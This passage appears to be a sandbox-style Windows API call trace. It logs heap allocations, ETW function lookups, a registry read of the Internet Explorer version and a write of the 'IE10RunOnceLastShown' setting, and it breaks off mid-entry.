[0048.322] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89d0 | out: hHeap=0x490000) returned 1 [0048.322] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89b8 | out: hHeap=0x490000) returned 1 [0048.323] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9858 [0048.324] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4d01e8 [0048.324] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9858 | out: hHeap=0x490000) returned 1 [0048.324] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e2560 [0048.324] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.324] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc8) returned 0x4e8378 [0048.325] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e8378 | out: hHeap=0x490000) returned 1 [0048.325] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x30) returned 0x4e2598 [0048.325] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2598 | out: hHeap=0x490000) returned 1 [0048.326] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x7c) returned 0x4e8378 [0048.326] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2560 | out: hHeap=0x490000) returned 1 [0048.326] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e8378 | out: hHeap=0x490000) returned 1 [0048.330] memcpy (in: _Dst=0xcdf148, _Src=0x4e9b56, _Size=0x4 | out: _Dst=0xcdf148) returned 0xcdf148 [0048.330] memcpy (in: _Dst=0xcdf148, _Src=0x4e9463, _Size=0x4 | out: _Dst=0xcdf148) returned 0xcdf148 [0048.330] memcpy (in: _Dst=0xcdf148, _Src=0x4e9467, _Size=0x2 | out: _Dst=0xcdf148) returned 0xcdf148 [0048.331] memcpy (in: _Dst=0xcdf148, _Src=0x4e9469, _Size=0x2 | out: _Dst=0xcdf148) returned 0xcdf148 [0048.331] memcpy (in: _Dst=0xcdf148, _Src=0x4e946b, _Size=0x2 | out: _Dst=0xcdf148) returned 0xcdf148 [0048.338] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xbc) returned 0x4ea268 [0048.338] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4ddbf8 [0048.342] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9858 [0048.342] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4ea608 [0048.342] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d89e8 [0048.342] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89e8 | out: hHeap=0x490000) returned 1 [0048.343] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4eaa58 [0048.343] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4ddc28 [0048.343] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9858 | out: hHeap=0x490000) returned 1 [0048.344] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ea608 | out: hHeap=0x490000) returned 1 [0048.344] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9858 [0048.344] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4ea420 [0048.344] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d89e8 [0048.345] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89e8 | out: hHeap=0x490000) returned 1 [0048.345] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4ea5b8 [0048.345] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4ddc58 [0048.345] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9858 | out: hHeap=0x490000) returned 1 [0048.345] memcpy (in: _Dst=0xcdf158, _Src=0x4ea77b, _Size=0x2 | out: _Dst=0xcdf158) returned 0xcdf158 [0048.345] memcpy (in: _Dst=0xcdf158, _Src=0x4ea77d, _Size=0x2 | out: _Dst=0xcdf158) returned 0xcdf158 [0048.346] memcpy (in: _Dst=0xcdf158, _Src=0x4ea77f, _Size=0x2 | out: _Dst=0xcdf158) returned 0xcdf158 [0048.346] memcpy (in: _Dst=0xcdf158, _Src=0x4ea781, _Size=0x2 | out: _Dst=0xcdf158) returned 0xcdf158 [0048.346] memcpy (in: _Dst=0xcdf158, _Src=0x4eb6b0, _Size=0x4 | out: _Dst=0xcdf158) returned 0xcdf158 [0048.347] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ea420 | out: hHeap=0x490000) returned 1 [0048.349] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ea5b8 | out: hHeap=0x490000) returned 1 [0048.349] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4eaa58 | out: hHeap=0x490000) returned 1 [0048.349] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddc28 | out: hHeap=0x490000) returned 1 [0048.350] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddc58 | out: hHeap=0x490000) returned 1 [0048.350] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddbf8 | out: hHeap=0x490000) returned 1 [0048.351] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ea268 | out: hHeap=0x490000) returned 1 [0048.352] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x40) returned 0x4bbbb8 [0048.352] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x16) returned 0x4d01e8 [0048.352] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.352] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4bbbb8 | out: hHeap=0x490000) returned 1 [0048.353] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x40) returned 0x4bbbb8 [0048.353] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x16) returned 0x4d01e8 [0048.353] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.354] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4bbbb8 | out: hHeap=0x490000) returned 1 [0048.354] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x58) returned 0x4dfcf0 [0048.354] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x22) returned 0x4ddbf8 [0048.355] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddbf8 | out: hHeap=0x490000) returned 1 [0048.355] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dfcf0 | out: hHeap=0x490000) returned 1 [0048.356] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x58) returned 0x4dfcf0 [0048.356] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x22) returned 0x4ddbf8 [0048.356] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ddbf8 | out: hHeap=0x490000) returned 1 [0048.357] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dfcf0 | out: hHeap=0x490000) returned 1 [0048.407] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x34) returned 0x4e0fb0 [0048.407] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x38) returned 0x4e0ff0 [0048.415] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9868 [0048.415] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8c) returned 0x4e9f58 [0048.416] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9868 | out: hHeap=0x490000) returned 1 [0048.417] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1c) returned 0x4e6a68 [0048.418] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e2640 [0048.419] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2640 | out: hHeap=0x490000) returned 1 [0048.419] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e2640 [0048.424] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2640 | out: hHeap=0x490000) returned 1 [0048.424] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e6a68 | out: hHeap=0x490000) returned 1 [0048.427] GetModuleHandleW (lpModuleName="AdvAPI32") returned 0x75910000 [0048.427] GetProcAddress (hModule=0x75910000, lpProcName="EventRegister") returned 0x7749f6ba [0048.427] GetProcAddress (hModule=0x75910000, lpProcName="EventUnregister") returned 0x774b9241 [0048.427] GetProcAddress (hModule=0x75910000, lpProcName="EventWrite") returned 0x774c0c59 [0048.427] GetProcAddress (hModule=0x75910000, lpProcName="EventActivityIdControl") returned 0x774cebaf [0048.427] GetProcAddress (hModule=0x75910000, lpProcName="EventWriteTransfer") returned 0x774cec65 [0048.427] GetProcAddress (hModule=0x75910000, lpProcName="EventEnabled") returned 0x774988e2 [0048.427] EtwEventRegister () returned 0x0 [0048.428] EtwEventWrite () returned 0x0 [0048.429] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x28) returned 0x4ddcb8 [0048.429] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x1 [0048.439] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e6568 | out: hHeap=0x490000) returned 1 [0048.439] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0088 | out: hHeap=0x490000) returned 1 [0048.440] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00a8 | out: hHeap=0x490000) returned 1 [0048.440] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00c8 | out: hHeap=0x490000) returned 1 [0048.440] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.440] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0108 | out: hHeap=0x490000) returned 1 [0048.440] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7cc0 | out: hHeap=0x490000) returned 1 [0048.442] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7cc0 [0048.442] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4edbc8 [0048.442] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4edbc8 | out: hHeap=0x490000) returned 1 [0048.442] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4e6658 [0048.442] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00c8 [0048.442] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00a8 [0048.443] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0088 [0048.443] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d01e8 [0048.443] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0208 [0048.443] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0228 [0048.443] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4edbc8 [0048.443] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4ef520 [0048.444] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4edbc8 | out: hHeap=0x490000) returned 1 [0048.446] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x70) returned 0x4ef818 [0048.446] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e23a0 [0048.446] SetLastError (dwErrCode=0x0) [0048.446] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.446] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9868 [0048.446] SetLastError (dwErrCode=0x0) [0048.446] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9868, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9868, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.446] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9888 [0048.446] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9868 | out: hHeap=0x490000) returned 1 [0048.446] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4d00e8 [0048.448] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4d00e8, pulNumLanguages=0xcdf270 | out: pulNumLanguages=0xcdf270) returned 1 [0048.449] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.449] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b81c0 [0048.449] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00e8 [0048.449] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0248 [0048.449] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0268 [0048.449] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0288 [0048.449] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02a8 [0048.449] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02c8 [0048.449] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4e6c70 [0048.453] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4ef920 [0048.453] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f8568 [0048.453] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.454] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f8b78 [0048.454] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f9068 [0048.455] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f8b78 | out: hHeap=0x490000) returned 1 [0048.455] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4f8760 [0048.456] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f9068 | out: hHeap=0x490000) returned 1 [0048.456] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f8568 | out: hHeap=0x490000) returned 1 [0048.457] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4c) returned 0x4df028 [0048.457] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4ef920 [0048.457] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\", ulOptions=0x0, samDesired=0x1, phkResult=0xcdf0c8 | out: phkResult=0xcdf0c8*=0x204) returned 0x0 [0048.457] RegQueryValueExW (in: hKey=0x204, lpValueName="Version", lpReserved=0x0, lpType=0xcdf08c, lpData=0x0, lpcbData=0xcdf090*=0x0 | out: lpType=0xcdf08c*=0x1, lpData=0x0, lpcbData=0xcdf090*=0x1e) returned 0x0 [0048.457] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x40) returned 0x4bbe88 [0048.457] RegQueryValueExW (in: hKey=0x204, lpValueName="Version", lpReserved=0x0, lpType=0xcdf08c, lpData=0x4bbe88, lpcbData=0xcdf090*=0x20 | out: lpType=0xcdf08c*=0x1, lpData="8.0.7601.17514", lpcbData=0xcdf090*=0x1e) returned 0x0 [0048.458] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4bbe88 | out: hHeap=0x490000) returned 1 [0048.458] RegCloseKey (hKey=0x204) returned 0x0 [0048.460] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef920 | out: hHeap=0x490000) returned 1 [0048.461] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4df028 | out: hHeap=0x490000) returned 1 [0048.461] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f8760 | out: hHeap=0x490000) returned 1 [0048.462] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e6c70 | out: hHeap=0x490000) returned 1 [0048.462] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.462] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0248 | out: hHeap=0x490000) returned 1 [0048.462] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0268 | out: hHeap=0x490000) returned 1 [0048.462] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0288 | out: hHeap=0x490000) returned 1 [0048.462] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02a8 | out: hHeap=0x490000) returned 1 [0048.462] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02c8 | out: hHeap=0x490000) returned 1 [0048.463] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b81c0 | out: hHeap=0x490000) returned 1 [0048.463] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9868 [0048.463] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4c9868, pulNumLanguages=0xcdf284 | out: pulNumLanguages=0xcdf284) returned 1 [0048.463] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9868 | out: hHeap=0x490000) returned 1 [0048.463] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.463] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e6658 | out: hHeap=0x490000) returned 1 [0048.463] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00c8 | out: hHeap=0x490000) returned 1 [0048.464] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00a8 | out: hHeap=0x490000) returned 1 [0048.464] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0088 | out: hHeap=0x490000) returned 1 [0048.464] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.464] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0208 | out: hHeap=0x490000) returned 1 [0048.464] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0228 | out: hHeap=0x490000) returned 1 [0048.464] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7cc0 | out: hHeap=0x490000) returned 1 [0048.465] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef520 | out: hHeap=0x490000) returned 1 [0048.465] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e23a0 | out: hHeap=0x490000) returned 1 [0048.466] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4ef818 | out: hHeap=0x490000) returned 1 [0048.471] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7cc0 [0048.472] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d89b8 [0048.472] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89b8 | out: hHeap=0x490000) returned 1 [0048.472] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4e6568 [0048.472] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0208 [0048.472] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d01e8 [0048.472] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0088 [0048.472] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00a8 [0048.472] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00c8 [0048.472] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02c8 [0048.473] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4d89b8 [0048.473] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4efd08 [0048.473] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89b8 | out: hHeap=0x490000) returned 1 [0048.473] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x70) returned 0x4ef690 [0048.473] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2c) returned 0x4e23a0 [0048.473] SetLastError (dwErrCode=0x0) [0048.473] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.473] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9888 [0048.473] SetLastError (dwErrCode=0x0) [0048.473] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9888, pcchLanguagesBuffer=0xcdf220 | out: pulNumLanguages=0xcdf270, pwszLanguagesBuffer=0x4c9888, pcchLanguagesBuffer=0xcdf220) returned 1 [0048.473] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9868 [0048.474] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4d0228 [0048.474] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4d0228, pulNumLanguages=0xcdf270 | out: pulNumLanguages=0xcdf270) returned 1 [0048.474] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0228 | out: hHeap=0x490000) returned 1 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b81c0 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0228 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d02a8 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0288 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0268 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0248 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00e8 [0048.474] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4e6658 [0048.477] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4d89b8 [0048.477] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f8760 [0048.477] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89b8 | out: hHeap=0x490000) returned 1 [0048.478] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f8ee0 [0048.478] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1ec) returned 0x4f9260 [0048.479] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f8ee0 | out: hHeap=0x490000) returned 1 [0048.479] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4f8958 [0048.480] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f9260 | out: hHeap=0x490000) returned 1 [0048.480] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f8760 | out: hHeap=0x490000) returned 1 [0048.480] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x54) returned 0x4e0050 [0048.481] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x2a) returned 0x4e2560 [0048.482] GetTickCount () returned 0x19f5671 [0048.482] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\Main", ulOptions=0x0, samDesired=0x2, phkResult=0xcdf160 | out: phkResult=0xcdf160*=0x20c) returned 0x0 [0048.482] GetProcAddress (hModule=0x75130000, lpProcName="RegSetValueExW") returned 0x75145b9d [0048.482] RegSetValueExW (hKey=0x20c, lpValueName="IE10RunOnceLastShown", Reserved=0x0, dwType=0x4, lpData=0xcdf0fc, cbData=0x4) returned 0x0 [0048.484] RegCloseKey (hKey=0x20c) returned 0x0 [0048.486] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2560 | out: hHeap=0x490000) returned 1 [0048.486] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e0050 | out: hHeap=0x490000) returned 1 [0048.487] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4f8958 | out: hHeap=0x490000) returned 1 [0048.487] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e6658 | out: hHeap=0x490000) returned 1 [0048.487] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0228 | out: hHeap=0x490000) returned 1 [0048.488] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02a8 | out: hHeap=0x490000) returned 1 [0048.488] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0288 | out: hHeap=0x490000) returned 1 [0048.488] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0268 | out: hHeap=0x490000) returned 1 [0048.488] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0248 | out: hHeap=0x490000) returned 1 [0048.488] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00e8 | out: hHeap=0x490000) returned 1 [0048.488] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b81c0 | out: hHeap=0x490000) returned 1 [0048.488] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9888 [0048.488] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4c9888, pulNumLanguages=0xcdf284 | out: pulNumLanguages=0xcdf284) returned 1 [0048.488] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9888 | out: hHeap=0x490000) returned 1 [0048.488] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9868 | out: hHeap=0x490000) returned 1 [0048.489] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e6568 | out: hHeap=0x490000) returned 1 [0048.489] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0208 | out: hHeap=0x490000) returned 1 [0048.489] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d01e8 | out: hHeap=0x490000) returned 1 [0048.489] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0088 | out: hHeap=0x490000) returned 1 [0048.489] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00a8 | out: hHeap=0x490000) returned 1 [0048.489] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d00c8 | out: hHeap=0x490000) returned 1 [0048.489] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d02c8 | out: hHeap=0x490000) returned 1 [0048.490] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7cc0 | out: hHeap=0x490000) returned 1 [0048.490] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4efd08 | out: hHeap=0x490000) returned 1 [0048.491] HeapFree (in: hHeap=0x490000, 